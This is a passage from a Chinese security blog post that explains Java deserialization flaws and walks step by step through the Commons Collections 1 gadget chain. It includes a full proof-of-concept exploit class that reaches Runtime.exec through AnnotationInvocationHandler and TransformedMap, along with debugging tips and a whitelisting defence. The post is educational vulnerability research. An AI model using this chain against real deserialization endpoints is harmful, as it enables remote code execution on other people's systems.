        &#x2F;&#x2F; 3. 受害者反序列化 -&gt; 触发命令执行
        ByteArrayInputStream bis &#x3D; new ByteArrayInputStream(maliciousData);
        ObjectInputStream ois &#x3D; new ObjectInputStream(bis);
        ois.readObject(); &#x2F;&#x2F; 此处弹出计算器！
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>分析</p>
<pre class="line-numbers language-none"><code class="language-none">public class VulnerableObject implements Serializable &#123;
    private String command;
    &#x2F;&#x2F; 构造方法：设置要执行的命令
    public VulnerableObject(String command) &#123; this.command &#x3D; command; &#125;

    &#x2F;&#x2F; 反序列化时自动触发
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException &#123;
        in.defaultReadObject(); &#x2F;&#x2F; 默认反序列化
        Runtime.getRuntime().exec(this.command); &#x2F;&#x2F; 炸弹引爆点💣
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>攻击流程</strong>：</p>
<ol>
<li><p><strong>构造恶意对象</strong>：<code>VulnerableObject payload = new VulnerableObject(&quot;calc.exe&quot;);</code><br> → 相当于制作一个藏了刀的盒子</p>
</li>
<li><p><strong>序列化成字节流</strong>：</p>
 <pre class="line-numbers language-none"><code class="language-none">ByteArrayOutputStream bos &#x3D; new ByteArrayOutputStream();
ObjectOutputStream oos &#x3D; new ObjectOutputStream(bos);
oos.writeObject(payload); &#x2F;&#x2F; 把刀盒封装成快递
byte[] maliciousData &#x3D; bos.toByteArray(); &#x2F;&#x2F; 包裹<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
</li>
<li><p><strong>触发漏洞</strong>：</p>
 <pre class="line-numbers language-none"><code class="language-none">ByteArrayInputStream bis &#x3D; new ByteArrayInputStream(maliciousData);
ObjectInputStream ois &#x3D; new ObjectInputStream(bis);
ois.readObject(); &#x2F;&#x2F; 拆快递盒 → 刀（弹出计算器）<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre></li>
</ol>
<p><strong>关键点</strong>：</p>
<ul>
<li><strong>漏洞本质</strong>：反序列化是“自动拆箱”过程，<code>readObject()</code>是拆箱工具 → 如果拆箱规则被篡改（重写方法），拆箱时就会执行恶意操作</li>
<li><strong>关键词定位</strong>：<br>  <code>implements Serializable</code> + <code>private void readObject()</code> → 立刻警惕是否包含危险代码（如<code>Runtime.exec()</code>）</li>
</ul>
<p>从中我们能提取哪些关键概念？</p>
<hr>
<h3 id="二、从答案反推核心概念"><a href="#二、从答案反推核心概念" class="headerlink" title="二、从答案反推核心概念"></a><strong>二、从答案反推核心概念</strong></h3><h4 id="1-基础点"><a href="#1-基础点" class="headerlink" title="**1. 基础点"></a>**1. 基础点</h4><ul>
<li><strong>序列化</strong>：对象 → 字节流（<code>ObjectOutputStream.writeObject()</code>）</li>
<li><strong>反序列化</strong>：字节流 → 对象（<code>ObjectInputStream.readObject()</code>）</li>
<li><strong>可序列化的条件</strong>：类必须实现 <code>Serializable</code> 接口（标记接口，无方法）</li>
</ul>
<blockquote>
<p> <strong>类比数学公式</strong>：<br><code>序列化 = writeObject()</code>，<code>反序列化 = readObject()</code>，<code>Serializable</code> 是“许可证”。</p>
</blockquote>
<h4 id="2-相关知识"><a href="#2-相关知识" class="headerlink" title="2. 相关知识"></a><strong>2. 相关知识</strong></h4><ul>
<li><strong><code>readObject()</code> 是“自动触发器”</strong>：反序列化时JVM自动调用该方法，<strong>重写它可能引入漏洞</strong>（如上例的 <code>Runtime.exec()</code>）</li>
<li><strong><code>transient</code> 字段不序列化</strong>：比如密码字段应加 <code>transient</code> 避免泄露</li>
<li><strong><code>serialVersionUID</code> 是版本号</strong>：显式声明可避免类结构变更导致的兼容问题</li>
</ul>
<blockquote>
<p> <strong>解题关键词</strong>：<br>看到 <code>readObject()</code> → 警惕是否重写 → 检查内部逻辑是否有危险操作（如执行命令、反射调用）。</p>
</blockquote>
<hr>
<h3 id="三、解题思路：为什么漏洞能利用？"><a href="#三、解题思路：为什么漏洞能利用？" class="headerlink" title="三、解题思路：为什么漏洞能利用？"></a><strong>三、解题思路：为什么漏洞能利用？</strong></h3><h4 id="步骤拆解"><a href="#步骤拆解" class="headerlink" title="步骤拆解"></a><strong>步骤拆解</strong></h4><ol>
<li><strong>目标定位</strong>：找到重写 <code>readObject()</code> 的类（如 <code>VulnerableObject</code>）<br> → <strong>关键词</strong>：类实现 <code>Serializable</code> + 自定义 <code>readObject</code> 方法</li>
<li><strong>构造恶意输入</strong>：设置危险参数（如 <code>command = &quot;calc.exe&quot;</code>）</li>
<li><strong>序列化传递</strong>：将对象转为字节流（攻击载荷）</li>
<li><strong>触发漏洞</strong>：受害者反序列化时自动执行 <code>readObject()</code> 中的恶意代码</li>
</ol>
<blockquote>
<p> <strong>漏洞本质</strong>：<br>反序列化是<strong>“盲盒拆箱”过程</strong>。如果箱子（类）的拆箱规则（<code>readObject</code>）被动了手脚，拆箱时就可能爆炸（执行恶意代码）。</p>
</blockquote>
<hr>
<h3 id="四、漏洞利用链的解题逻辑"><a href="#四、漏洞利用链的解题逻辑" class="headerlink" title="四、漏洞利用链的解题逻辑"></a><strong>四、漏洞利用链的解题逻辑</strong></h3><p>实际漏洞很少像上面那么简单，而是像<strong>多米诺骨牌</strong>一样串联调用（称为Gadget Chain）。例如：</p>
<pre class="line-numbers language-none"><code class="language-none">readObject() → 调用A类方法 → 调用B类方法 →...→ 执行Runtime.exec()<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<pre class="line-numbers language-none"><code class="language-none">

readObject-&gt;&gt;TransformedMap: 遍历Map触发setValue()
TransformedMap-&gt;&gt;ChainedTransformer: 调用transform()
ChainedTransformer-&gt;&gt;InvokerTransformer1: 执行ConstantTransformer
InvokerTransformer1-&gt;&gt;InvokerTransformer2: 反射getMethod()
InvokerTransformer2-&gt;&gt;InvokerTransformer3: 反射invoke()
InvokerTransformer3-&gt;&gt;Runtime.exec(): 弹计算器！<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>解题方法</strong>：</p>
<ol>
<li><strong>起点</strong>：找到一个可触发反序列化的入口（如网络接口接收数据流）</li>
<li><strong>中间跳板</strong>：利用JDK或第三方库（如Apache Commons Collections）中的危险类：<ul>
<li>例如 <code>InvokerTransformer.transform()</code> 可通过反射执行任意方法</li>
</ul>
</li>
<li><strong>终点</strong>：连接到最终执行点（如命令执行、文件读写）</li>
</ol>
<blockquote>
<p> <strong>关键词定位链</strong>：</p>
<ul>
<li>搜索 <code>readObject()</code> 中调用的其他类方法</li>
<li>检查这些方法是否调用危险函数（如反射、JNDI、文件操作）</li>
</ul>
</blockquote>
<hr>
<h3 id="五、防御措施"><a href="#五、防御措施" class="headerlink" title="五、防御措施"></a><strong>五、防御措施</strong></h3><ol>
<li><strong>避免反序列化不可信数据</strong>：像做数学题验算一样，永远校验数据对没</li>
<li><strong>替换原生序列化</strong>：用JSON&#x2F;XML等更安全的格式（如Jackson、Gson）</li>
<li><strong>白名单控制</strong>：限制可反序列化的类（如 <code>ObjectInputStream</code> 的 <code>accept</code> 列表）</li>
<li><strong>加固关键类</strong>：对敏感类（如 <code>ObjectInputStream</code>）重写 <code>resolveClass()</code> 做校验</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;&#x2F; 防御示例：自定义ObjectInputStream添加白名单
public class SafeObjectInputStream extends ObjectInputStream &#123;
    @Override
    protected Class&lt;?&gt; resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException &#123;
        if (!desc.getName().equals(&quot;com.safe.MyClass&quot;)) &#123; &#x2F;&#x2F; 只允许反序列化指定类
            throw new InvalidClassException(&quot;Unauthorized class: &quot;, desc.getName());
        &#125;
        return super.resolveClass(desc);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<hr>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a><strong>总结</strong></h3><p>Java反序列化漏洞的本质是：<br><strong>控制输入流 → 触发危险 <code>readObject()</code> → 串联调用链（Gadget）→ 达到攻击效果</strong>  </p>
<h2 id="javaCC1链"><a href="#javaCC1链" class="headerlink" title="javaCC1链"></a>javaCC1链</h2><h3 id="一、环境准备与漏洞背景"><a href="#一、环境准备与漏洞背景" class="headerlink" title="一、环境准备与漏洞背景"></a><strong>一、环境准备与漏洞背景</strong></h3><h4 id="1-复现环境"><a href="#1-复现环境" class="headerlink" title="1. 复现环境"></a>1. <strong>复现环境</strong></h4><ul>
<li><p><strong>JDK版本</strong>：≤8u65（高版本修复<code>AnnotationInvocationHandler</code>的反序列化逻辑）<br>下载：<a target="_blank" rel="noopener" href="https://www.oracle.com/cn/java/technologies/javase/javase8-archive-downloads.html">https://www.oracle.com/cn/java/technologies/javase/javase8-archive-downloads.html</a> ；<br>（友情提示：如果下载出来是jdk8u111，把&#x2F;cn删去）</p>
</li>
<li><p><strong>依赖库</strong>：Commons Collections 3.2.1</p>
  <pre class="line-numbers language-none"><code class="language-none">&lt;dependency&gt;
    &lt;groupId&gt;commons-collections&lt;&#x2F;groupId&gt;
    &lt;artifactId&gt;commons-collections&lt;&#x2F;artifactId&gt;
    &lt;version&gt;3.2.1&lt;&#x2F;version&gt;
&lt;&#x2F;dependency&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre></li>
</ul>
<h4 id="2-漏洞核心逻辑"><a href="#2-漏洞核心逻辑" class="headerlink" title="2. 漏洞核心逻辑"></a>2. <strong>漏洞核心逻辑</strong></h4><ul>
<li><strong>先找到起点</strong>：反序列化入口<code>AnnotationInvocationHandler.readObject()</code></li>
<li><strong>确定终点</strong>：<code>InvokerTransformer.transform()</code>通过反射执行任意命令（如<code>Runtime.exec(&quot;calc&quot;)</code>）</li>
<li><strong>目标</strong>：构造一条从<code>readObject()</code>到<code>transform()</code>的调用链，触发RCE。</li>
</ul>
<hr>
<h3 id="二、分步拆解：CC1链的构造"><a href="#二、分步拆解：CC1链的构造" class="headerlink" title="二、分步拆解：CC1链的构造"></a><strong>二、分步拆解：CC1链的构造</strong></h3><h4 id="步骤1：终点-InvokerTransformer"><a href="#步骤1：终点-InvokerTransformer" class="headerlink" title="步骤1：终点 - InvokerTransformer"></a><strong>步骤1：终点 - <code>InvokerTransformer</code></strong></h4><p><strong>作用</strong>：通过反射动态调用任意方法，是命令执行的最终触发点。<br><strong>关键代码</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">public Object transform(Object input) &#123;
    Method method &#x3D; input.getClass().getMethod(iMethodName, iParamTypes);
    return method.invoke(input, iArgs); &#x2F;&#x2F; 反射调用任意方法
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>测试验证</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">InvokerTransformer it &#x3D; new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;);
it.transform(Runtime.getRuntime()); &#x2F;&#x2F; 弹出计算器<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p><strong>为什么是它？</strong></p>
<ul>
<li>参数<code>iMethodName</code>、<code>iParamTypes</code>、<code>iArgs</code>完全可控，可构造任意反射调用。</li>
<li>类实现<code>Serializable</code>，支持序列化&#x2F;反序列化。</li>
</ul>
<hr>
<h4 id="步骤2：构建反射调用链-ChainedTransformer"><a href="#步骤2：构建反射调用链-ChainedTransformer" class="headerlink" title="步骤2：构建反射调用链 - ChainedTransformer"></a><strong>步骤2：构建反射调用链 - <code>ChainedTransformer</code></strong></h4><p><strong>问题</strong>：直接调用<code>Runtime.getRuntime()</code>会被安全策略拦截，需通过反射链间接获取<code>Runtime</code>实例。<br><strong>解决方案</strong>：</p>
<ul>
<li>**<code>ConstantTransformer</code>**：返回固定对象（如<code>Runtime.class</code>），无视输入。</li>
<li>**<code>ChainedTransformer</code>**：串联多个<code>Transformer</code>，前者的输出作为后者的输入。</li>
</ul>
<p><strong>构造反射链</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">Transformer[] chain &#x3D; new Transformer[]&#123;
    new ConstantTransformer(Runtime.class), &#x2F;&#x2F; 返回Runtime.class对象
    new InvokerTransformer(&quot;getMethod&quot;,     &#x2F;&#x2F; 反射调用getMethod(&quot;getRuntime&quot;)
        new Class[]&#123;String.class, Class[].class&#125;, 
        new Object[]&#123;&quot;getRuntime&quot;, null&#125;),
    new InvokerTransformer(&quot;invoke&quot;,         &#x2F;&#x2F; 调用getRuntime()获取实例
        new Class[]&#123;Object.class, Object[].class&#125;, 
        new Object[]&#123;null, null&#125;),
    new InvokerTransformer(&quot;exec&quot;,          &#x2F;&#x2F; 执行命令
        new Class[]&#123;String.class&#125;, 
        new Object[]&#123;&quot;calc.exe&quot;&#125;)
&#125;;
Transformer chain &#x3D; new ChainedTransformer(chain);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>逻辑等价</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">Runtime.getRuntime().exec(&quot;calc.exe&quot;);<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>为什么用链？</strong></p>
<ul>
<li>绕过直接调用<code>Runtime</code>的限制，通过反射分步获取对象。</li>
<li>链式调用符合反序列化时“逐步触发”的特性。</li>
</ul>
<hr>
<h4 id="步骤3：寻找触发点-TransformedMap"><a href="#步骤3：寻找触发点-TransformedMap" class="headerlink" title="步骤3：寻找触发点 - TransformedMap"></a><strong>步骤3：寻找触发点 - <code>TransformedMap</code></strong></h4><p><strong>作用</strong>：装饰普通<code>Map</code>，在修改值时自动调用<code>Transformer</code>。<br><strong>关键方法</strong>：</p>
<ul>
<li><code>TransformedMap.decorate()</code>：创建装饰后的<code>Map</code>实例。</li>
<li><code>checkSetValue()</code>：在<code>MapEntry.setValue()</code>时触发<code>valueTransformer.transform()</code>。</li>
</ul>
<p><strong>构造触发点</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">Map&lt;String, String&gt; rawMap &#x3D; new HashMap&lt;&gt;();
rawMap.put(&quot;key&quot;, &quot;value&quot;); &#x2F;&#x2F; 需注意：key必须为&quot;value&quot;（见步骤4）
Map transformedMap &#x3D; TransformedMap.decorate(rawMap, null, chain); &#x2F;&#x2F; 绑定Transformer链<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><strong>为什么是它？</strong></p>
<ul>
<li><code>TransformedMap</code>是连接<code>Map</code>操作与<code>Transformer</code>调用的桥梁。</li>
<li><code>setValue()</code>是反序列化过程中可被自动调用的方法。</li>
</ul>
<hr>
<h4 id="步骤4：反序列化入口-AnnotationInvocationHandler"><a href="#步骤4：反序列化入口-AnnotationInvocationHandler" class="headerlink" title="步骤4：反序列化入口 - AnnotationInvocationHandler"></a><strong>步骤4：反序列化入口 - <code>AnnotationInvocationHandler</code></strong></h4><p><strong>作用</strong>：JDK内部类，反序列化时自动遍历<code>Map</code>并调用<code>setValue()</code>。<br><strong>关键逻辑</strong>：</p>
<ul>
<li><code>readObject()</code> → 遍历<code>memberValues</code>（<code>Map</code>类型） → 调用<code>MapEntry.setValue()</code>。</li>
<li><strong>条件限制</strong>：<ol>
<li><code>memberTypes.get(key)</code>不为空（需选择带方法的注解类，如<code>Target.class</code>）。</li>
<li><code>key</code>必须为<code>&quot;value&quot;</code>（绕过JDK内部校验）。</li>
</ol>
</li>
</ul>
<p><strong>反射构造实例</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">Class&lt;?&gt; clazz &#x3D; Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);
Constructor&lt;?&gt; ctor &#x3D; clazz.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
Object handler &#x3D; ctor.newInstance(Target.class, transformedMap); &#x2F;&#x2F; 使用Target注解类<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>为什么是Target.class？</strong></p>
<ul>
<li><code>Target</code>注解定义了<code>value()</code>方法，满足<code>memberTypes.get(&quot;value&quot;) != null</code>的条件。</li>
</ul>
<hr>
<h4 id="步骤5：组装Payload并触发漏洞"><a href="#步骤5：组装Payload并触发漏洞" class="headerlink" title="步骤5：组装Payload并触发漏洞"></a><strong>步骤5：组装Payload并触发漏洞</strong></h4><p><strong>完整POC代码</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.TransformedMap;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

public class CC1Exploit &#123;
    public static void main(String[] args) throws Exception &#123;
        &#x2F;&#x2F; 1. 构造Transformer链
        Transformer[] chain &#x3D; new Transformer[]&#123;
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer(&quot;getMethod&quot;, 
                new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;),
            new InvokerTransformer(&quot;invoke&quot;, 
                new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),
            new InvokerTransformer(&quot;exec&quot;, 
                new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc.exe&quot;&#125;)
        &#125;;
        ChainedTransformer chain &#x3D; new ChainedTransformer(chain);

        &#x2F;&#x2F; 2. 创建TransformedMap
        Map&lt;String, String&gt; rawMap &#x3D; new HashMap&lt;&gt;();
        rawMap.put(&quot;value&quot;, &quot;dummy&quot;); &#x2F;&#x2F; Key必须为&quot;value&quot;！
        Map transformedMap &#x3D; TransformedMap.decorate(rawMap, null, chain);

        &#x2F;&#x2F; 3. 反射构造AnnotationInvocationHandler
        Class&lt;?&gt; clazz &#x3D; Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);
        Constructor&lt;?&gt; ctor &#x3D; clazz.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        Object handler &#x3D; ctor.newInstance(Target.class, transformedMap);

        &#x2F;&#x2F; 4. 序列化Payload
        try (ObjectOutputStream oos &#x3D; new ObjectOutputStream(new FileOutputStream(&quot;payload.bin&quot;))) &#123;
            oos.writeObject(handler);
        &#125;

        &#x2F;&#x2F; 5. 反序列化触发漏洞（模拟目标环境）
        try (ObjectInputStream ois &#x3D; new ObjectInputStream(new FileInputStream(&quot;payload.bin&quot;))) &#123;
            ois.readObject(); &#x2F;&#x2F; 此处弹出计算器！
        &#125;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>或者：</p>
<pre class="line-numbers language-none"><code class="language-none"> import org.apache.commons.collections.functors.InvokerTransformer;  
import org.apache.commons.collections.map.TransformedMap;  
  
import java.util.HashMap;  
import java.util.Map;  
  
public class SetValueTest01 &#123;  
    public static void main(String[] args) &#123;  
        Runtime runtime &#x3D; Runtime.getRuntime();  
 InvokerTransformer invokerTransformer &#x3D; new InvokerTransformer(&quot;exec&quot;  
 , new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;);  
 HashMap&lt;Object, Object&gt; hashMap &#x3D; new HashMap&lt;&gt;();  
 hashMap.put(&quot;key&quot;, &quot;value&quot;);  
 Map&lt;Object, Object&gt; decorateMap &#x3D; TransformedMap.decorate(hashMap, null, invokerTransformer);  
 for (Map.Entry entry:decorateMap.entrySet())&#123;  
            entry.setValue(runtime);  
 &#125;  
    &#125;  
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<hr>
<h3 id="三、调试与遇到的问题"><a href="#三、调试与遇到的问题" class="headerlink" title="三、调试与遇到的问题"></a><strong>三、调试与遇到的问题</strong></h3><h4 id="1-断点位置"><a href="#1-断点位置" class="headerlink" title="1. 断点位置"></a>1. <strong>断点位置</strong></h4><ul>
<li>**<code>InvokerTransformer.transform()</code>**：观察反射参数是否按链传递（应依次出现<code>Runtime.class</code>→<code>Method</code>→<code>Runtime实例</code>→<code>exec</code>）。</li>
<li>**<code>TransformedMap.checkSetValue()</code>**：验证是否被<code>AnnotationInvocationHandler.readObject()</code>调用。</li>
<li>**<code>AnnotationInvocationHandler.readObject()</code>**：跟踪<code>memberValues</code>遍历过程，检查<code>key=&quot;value&quot;</code>是否满足条件。</li>
</ul>
<h4 id="2-常见问题"><a href="#2-常见问题" class="headerlink" title="2. 常见问题"></a>2. <strong>常见问题</strong></h4><ul>
<li><strong>计算器未弹出</strong>：<ul>
<li>检查JDK版本是否为≤8u65（高版本需手动修补<code>AnnotationInvocationHandler</code>字节码）。</li>
<li>确认<code>Target.class</code>被正确引入（<code>import java.lang.annotation.Target</code>）。</li>
</ul>
</li>
<li><strong>空指针异常</strong>：<ul>
<li>确保<code>TransformedMap</code>的<code>key=&quot;value&quot;</code>（其他key会导致<code>memberTypes.get(key)=null</code>）。</li>
</ul>
</li>
</ul>
<hr>
<h3 id="四、总结：-1"><a href="#四、总结：-1" class="headerlink" title="四、总结："></a><strong>四、总结：</strong></h3><ol>
<li><strong>定位终点</strong>：找到可执行命令的类（<code>InvokerTransformer.transform()</code>）。</li>
<li><strong>构建反射链</strong>：通过<code>ChainedTransformer</code>串联反射调用，间接获取<code>Runtime</code>实例。</li>
<li><strong>寻找触发媒介</strong>：利用<code>TransformedMap</code>将<code>Map</code>操作转为<code>Transformer</code>调用。</li>
<li><strong>连接入口</strong>：通过<code>AnnotationInvocationHandler.readObject()</code>触发<code>Map</code>遍历。</li>
<li><strong>绕过限制</strong>：<ul>
<li>使用<code>Target.class</code>满足<code>memberTypes</code>校验。</li>
<li>设置<code>key=&quot;value&quot;</code>绕过JDK内部逻辑。</li>
</ul>
</li>
</ol>
<blockquote>
<p>💡 <strong>核心思路</strong>：<br><strong>反序列化漏洞 &#x3D; 可控的起点 + 串联的调用链 + 安全风险的终点</strong>。——从终点（RCE）反向推导，每一步需严格满足参数传递与条件约束，最终形成逻辑闭环。</p>
</blockquote>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Apzx7</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://Apzx7.github.io/2025/07/21/javasec/">http://Apzx7.github.io/2025/07/21/javasec/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Apzx7</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/">
                                    <span class="chip bg-color">漏洞原理</span>
                                </a>
                            
                                <a href="/tags/Java%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Java安全</span>
                                </a>
                            
                                <a href="/tags/Java/">
                                    <span class="chip bg-color">Java</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2025/10/07/web-ctf%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E6%80%BB%E7%BB%93/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="web ctf之信息收集总结">
                        
                        <span class="card-title">web ctf之信息收集总结</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2025-10-07
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/CTF/" class="post-category">
                                    CTF
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CTF/">
                        <span class="chip bg-color">CTF</span>
                    </a>
                    
                    <a href="/tags/Web/">
                        <span class="chip bg-color">Web</span>
                    </a>
                    
                    <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">
                        <span class="chip bg-color">信息收集</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2025/06/10/2025H-NCTFweb%E9%A2%98%E5%A4%8D%E7%8E%B0/">
